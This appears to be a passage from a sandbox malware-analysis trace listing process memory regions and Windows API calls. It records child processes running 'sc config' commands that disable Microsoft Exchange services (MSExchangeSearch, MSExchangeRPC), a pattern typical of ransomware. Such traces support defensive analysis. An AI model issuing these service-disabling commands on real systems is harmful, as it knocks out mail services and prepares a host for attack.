Region: id = 8488 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 8489 start_va = 0x7a0000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 8490 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8491 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8492 start_va = 0x950000 end_va = 0xa4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 8493 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8494 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 8495 start_va = 0x4f0000 end_va = 0x4f3fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 8496 start_va = 0x5e0000 end_va = 0x69dfff entry_point = 0x5e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8497 start_va = 0x6a0000 end_va = 0x6dffff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 8498 start_va = 0x6e0000 end_va = 0x71ffff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 8499 start_va = 0x880000 end_va = 0x88ffff entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 8500 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8501 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8502 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8503 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8504 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8505 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8506 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8507 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8508 start_va = 0x7e570000 end_va = 0x7e66ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e570000" filename = "" Region: id = 8509 start_va = 0x7e699000 end_va = 0x7e69bfff entry_point = 0x0 region_type = private name = "private_0x000000007e699000" filename = "" Region: id = 8510 start_va = 0xa50000 end_va = 0xb2efff entry_point = 0xa50000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 8511 start_va = 0x720000 end_va = 0x731fff entry_point = 0x720000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 528 os_tid = 0xc3c [0132.787] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0132.787] __set_app_type (_Type=0x1) [0132.787] __p__fmode () returned 0x77ac4d6c [0132.787] __p__commode () returned 0x77ac5b1c [0132.787] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0132.787] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0132.787] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.789] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0132.789] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0132.789] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0132.789] _wcsicmp (_String1="config", _String2="query") returned -14 [0132.789] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0132.789] _wcsicmp (_String1="config", _String2="start") returned -16 [0132.789] _wcsicmp (_String1="config", _String2="pause") returned -13 [0132.789] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0132.789] _wcsicmp (_String1="config", _String2="control") returned -14 [0132.789] _wcsicmp (_String1="config", _String2="continue") returned -14 [0132.789] _wcsicmp (_String1="config", _String2="stop") returned -16 [0132.789] _wcsicmp (_String1="config", _String2="config") returned 0 [0132.789] ResolveDelayLoadedAPI () returned 0x77262c10 [0132.789] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x958cd0 [0132.791] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0132.791] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0132.791] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0132.791] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0132.791] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0132.791] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0132.791] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0132.791] OpenServiceW (hSCManager=0x958cd0, lpServiceName="MSExchangeRPC", dwDesiredAccess=0x3) returned 0x0 [0132.791] GetLastError () returned 0x424 [0132.791] _ultow (in: _Dest=0x424, _Radix=5962864 | out: _Dest=0x424) returned="1060" [0132.791] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0132.793] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x5afc4c, nSize=0x2, Arguments=0x5afc64 | out: lpBuffer="鐠\x95ﲌZ蔔è") returned 0x62 [0132.793] GetFileType (hFile=0x3c) returned 0x2 [0132.793] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5afc30 | out: lpMode=0x5afc30) returned 1 [0132.793] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x959420*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x5afc40, lpReserved=0x0 | out: lpBuffer=0x959420*, lpNumberOfCharsWritten=0x5afc40*=0x62) returned 1 [0132.794] LocalFree (hMem=0x959420) returned 0x0 [0132.794] LocalFree (hMem=0x0) returned 0x0 [0132.794] CloseServiceHandle (hSCObject=0x958cd0) returned 1 [0132.794] LocalFree (hMem=0x0) returned 0x0 [0132.794] exit (_Code=1060) Thread: id = 529 os_tid = 0x390 Process: id = "161" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x103be000" os_pid = "0xb3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config MSExchangeSearch start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8512 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 8513 start_va = 0x890000 end_va = 0x488ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 8514 start_va = 0x4890000 end_va = 0x48affff entry_point = 0x0 region_type = private name = "private_0x0000000004890000" filename = "" Region: id = 8515 start_va = 0x48b0000 end_va = 0x48b0fff entry_point = 0x0 region_type = private name = "private_0x00000000048b0000" filename = "" Region: id = 8516 start_va = 0x48c0000 end_va = 0x48d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048c0000" filename = "" Region: id = 8517 start_va = 0x48e0000 end_va = 0x491ffff entry_point = 0x0 region_type = private name = "private_0x00000000048e0000" filename = "" Region: id = 8518 start_va = 0x4920000 end_va = 0x4a1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004920000" filename = "" Region: id = 8519 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8520 start_va = 0x7f4d0000 end_va = 0x7f4f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f4d0000" filename = "" Region: id = 8521 start_va = 0x7f4f4000 end_va = 0x7f4f4fff entry_point = 0x0 region_type = private name = "private_0x000000007f4f4000" filename = "" Region: id = 8522 start_va = 0x7f4fc000 end_va = 0x7f4fefff entry_point = 0x0 region_type = private name = "private_0x000000007f4fc000" filename = "" Region: id = 8523 start_va = 0x7f4ff000 end_va = 0x7f4fffff entry_point = 0x0 region_type = private name = "private_0x000000007f4ff000" filename = "" Region: id = 8524 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8525 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8526 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 8527 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8528 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 8529 start_va = 0x4a20000 end_va = 0x4a23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a20000" filename = "" Region: id = 8530 start_va = 0x4a30000 end_va = 0x4a30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a30000" filename = "" Region: id = 8531 start_va = 0x4a40000 end_va = 0x4a41fff entry_point = 0x0 region_type = private name = "private_0x0000000004a40000" filename = "" Region: id = 8532 start_va = 0x4b70000 end_va = 0x4b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b70000" filename = "" Region: id = 8533 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8534 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8535 start_va = 0x4d10000 end_va = 0x4e0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d10000" filename = "" Region: id = 8536 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8577 start_va = 0x4890000 end_va = 0x489ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004890000" filename = "" Region: id = 8578 start_va = 0x48b0000 end_va = 0x48bffff entry_point = 0x0 region_type = private name = "private_0x00000000048b0000" filename = "" Region: id = 8579 start_va = 0x4a50000 end_va = 0x4b0dfff entry_point = 0x4a50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8580 start_va = 0x4b10000 end_va = 0x4b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b10000" filename = "" Region: id = 8581 start_va = 0x4b80000 end_va = 0x4c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b80000" filename = "" Region: id = 8582 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8583 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8584 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8585 start_va = 0x7f3d0000 end_va = 0x7f4cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f3d0000" filename = "" Region: id = 8586 start_va = 0x7f4f9000 end_va = 0x7f4fbfff entry_point = 0x0 region_type = private name = "private_0x000000007f4f9000" filename = "" Region: id = 8587 start_va = 0x48a0000 end_va = 0x48a3fff entry_point = 0x0 region_type = private name = "private_0x00000000048a0000" filename = "" Region: id = 8588 start_va = 0x4b50000 end_va = 0x4b53fff entry_point = 0x0 region_type = private name = "private_0x0000000004b50000" filename = "" Region: id = 8589 start_va = 0x4e10000 end_va = 0x5146fff entry_point = 0x4e10000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 530 os_tid = 0x620 [0132.982] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0132.982] __set_app_type (_Type=0x1) [0132.982] __p__fmode () returned 0x77ac4d6c [0132.982] __p__commode () returned 0x77ac5b1c [0132.982] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0132.982] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0132.982] GetCurrentThreadId () returned 0x620 [0132.982] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x620) returned 0x84 [0132.982] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0132.982] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0132.982] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.985] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0132.985] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4a1f944 | out: phkResult=0x4a1f944*=0x0) returned 0x2 [0132.985] VirtualQuery (in: lpAddress=0x4a1f94b, lpBuffer=0x4a1f8fc, dwLength=0x1c | out: lpBuffer=0x4a1f8fc*(BaseAddress=0x4a1f000, AllocationBase=0x4920000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.985] VirtualQuery (in: lpAddress=0x4920000, lpBuffer=0x4a1f8fc, dwLength=0x1c | out: lpBuffer=0x4a1f8fc*(BaseAddress=0x4920000, AllocationBase=0x4920000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0132.985] VirtualQuery (in: lpAddress=0x4921000, lpBuffer=0x4a1f8fc, dwLength=0x1c | out: lpBuffer=0x4a1f8fc*(BaseAddress=0x4921000, AllocationBase=0x4920000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0132.985] VirtualQuery (in: lpAddress=0x4923000, lpBuffer=0x4a1f8fc, dwLength=0x1c | out: lpBuffer=0x4a1f8fc*(BaseAddress=0x4923000, AllocationBase=0x4920000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.985] VirtualQuery (in: lpAddress=0x4a20000, lpBuffer=0x4a1f8fc, dwLength=0x1c | out: lpBuffer=0x4a1f8fc*(BaseAddress=0x4a20000, AllocationBase=0x4a20000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0132.985] GetConsoleOutputCP () returned 0x1b5 [0132.985] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0132.985] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0132.985] _get_osfhandle (_FileHandle=1) returned 0x3c [0132.985] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x3c [0132.986] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0132.986] _get_osfhandle (_FileHandle=1) returned 0x3c [0132.986] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0132.986] _get_osfhandle (_FileHandle=0) returned 0x38 [0132.986] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0132.987] _get_osfhandle (_FileHandle=0) returned 0x38 [0132.987] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0132.987] GetEnvironmentStringsW () returned 0x4d17d98* [0132.987] FreeEnvironmentStringsA (penv="A") returned 1 [0132.987] GetEnvironmentStringsW () returned 0x4d17d98* [0132.987] FreeEnvironmentStringsA (penv="A") returned 1 [0132.987] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4a1e8a8 | out: phkResult=0x4a1e8a8*=0x94) returned 0x0 [0132.987] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4a1e8ac, lpData=0x4a1e8b4, lpcbData=0x4a1e8b0*=0x1000 | out: lpType=0x4a1e8ac*=0x0, lpData=0x4a1e8b4*=0xf, lpcbData=0x4a1e8b0*=0x1000) returned 0x2 [0132.987] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4a1e8ac, lpData=0x4a1e8b4, lpcbData=0x4a1e8b0*=0x1000 | out: lpType=0x4a1e8ac*=0x4, lpData=0x4a1e8b4*=0x1, lpcbData=0x4a1e8b0*=0x4) returned 0x0 [0132.987] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4a1e8ac, lpData=0x4a1e8b4, lpcbData=0x4a1e8b0*=0x1000 | out: lpType=0x4a1e8ac*=0x0, lpData=0x4a1e8b4*=0x1, lpcbData=0x4a1e8b0*=0x1000) returned 0x2 [0132.987] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4a1e8ac, lpData=0x4a1e8b4, lpcbData=0x4a1e8b0*=0x1000 | out: lpType=0x4a1e8ac*=0x4, lpData=0x4a1e8b4*=0x0, lpcbData=0x4a1e8b0*=0x4) returned 0x0 [0132.988] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4a1e8ac, lpData=0x4a1e8b4, lpcbData=0x4a1e8b0*=0x1000 | out: lpType=0x4a1e8ac*=0x4, lpData=0x4a1e8b4*=0x40, lpcbData=0x4a1e8b0*=0x4) returned 0x0 [0132.988] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4a1e8ac, lpData=0x4a1e8b4, lpcbData=0x4a1e8b0*=0x1000 | out: lpType=0x4a1e8ac*=0x4, lpData=0x4a1e8b4*=0x40, lpcbData=0x4a1e8b0*=0x4) returned 0x0 [0132.988] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4a1e8ac, lpData=0x4a1e8b4, lpcbData=0x4a1e8b0*=0x1000 | out: lpType=0x4a1e8ac*=0x0, lpData=0x4a1e8b4*=0x40, lpcbData=0x4a1e8b0*=0x1000) returned 0x2 [0132.988] RegCloseKey (hKey=0x94) returned 0x0 [0132.988] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4a1e8a8 | out: phkResult=0x4a1e8a8*=0x94) returned 0x0 [0132.988] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4a1e8ac, lpData=0x4a1e8b4, lpcbData=0x4a1e8b0*=0x1000 | out: lpType=0x4a1e8ac*=0x0, lpData=0x4a1e8b4*=0x40, lpcbData=0x4a1e8b0*=0x1000) returned 0x2 [0132.988] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4a1e8ac, lpData=0x4a1e8b4, lpcbData=0x4a1e8b0*=0x1000 | out: lpType=0x4a1e8ac*=0x4, lpData=0x4a1e8b4*=0x1, lpcbData=0x4a1e8b0*=0x4) returned 0x0 [0132.988] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4a1e8ac, lpData=0x4a1e8b4, lpcbData=0x4a1e8b0*=0x1000 | out: lpType=0x4a1e8ac*=0x0, lpData=0x4a1e8b4*=0x1, lpcbData=0x4a1e8b0*=0x1000) returned 0x2 [0132.988] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4a1e8ac, lpData=0x4a1e8b4, lpcbData=0x4a1e8b0*=0x1000 | out: lpType=0x4a1e8ac*=0x4, lpData=0x4a1e8b4*=0x0, lpcbData=0x4a1e8b0*=0x4) returned 0x0 [0132.988] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4a1e8ac, lpData=0x4a1e8b4, lpcbData=0x4a1e8b0*=0x1000 | out: lpType=0x4a1e8ac*=0x4, lpData=0x4a1e8b4*=0x9, lpcbData=0x4a1e8b0*=0x4) returned 0x0 [0132.988] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4a1e8ac, lpData=0x4a1e8b4, lpcbData=0x4a1e8b0*=0x1000 | out: lpType=0x4a1e8ac*=0x4, lpData=0x4a1e8b4*=0x9, lpcbData=0x4a1e8b0*=0x4) returned 0x0 [0132.988] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4a1e8ac, lpData=0x4a1e8b4, lpcbData=0x4a1e8b0*=0x1000 | out: lpType=0x4a1e8ac*=0x0, lpData=0x4a1e8b4*=0x9, lpcbData=0x4a1e8b0*=0x1000) returned 0x2 [0132.988] RegCloseKey (hKey=0x94) returned 0x0 [0132.988] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29835 [0132.988] srand (_Seed=0x5ad29835) [0132.988] GetCommandLineW () returned="/c sc config MSExchangeSearch start= disabled" [0132.988] GetCommandLineW () returned="/c sc config MSExchangeSearch start= disabled" [0132.988] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0132.988] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4d19cf0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0132.988] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0132.988] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0132.988] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.988] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0132.988] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0132.988] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0132.988] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0132.988] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0132.988] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0132.988] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0132.988] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0132.988] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0132.989] GetEnvironmentStringsW () returned 0x4d17d98* [0132.989] FreeEnvironmentStringsA (penv="A") returned 1 [0132.989] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.989] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.989] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0132.989] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0132.989] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0132.989] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0132.989] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0132.989] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0132.989] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0132.989] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0132.989] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1f680 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0132.989] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4a1f680, lpFilePart=0x4a1f678 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4a1f678*="Desktop") returned 0x1d [0132.989] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0132.989] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4a1f400 | out: lpFindFileData=0x4a1f400) returned 0x4d105c8 [0132.989] FindClose (in: hFindFile=0x4d105c8 | out: hFindFile=0x4d105c8) returned 1 [0132.989] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", 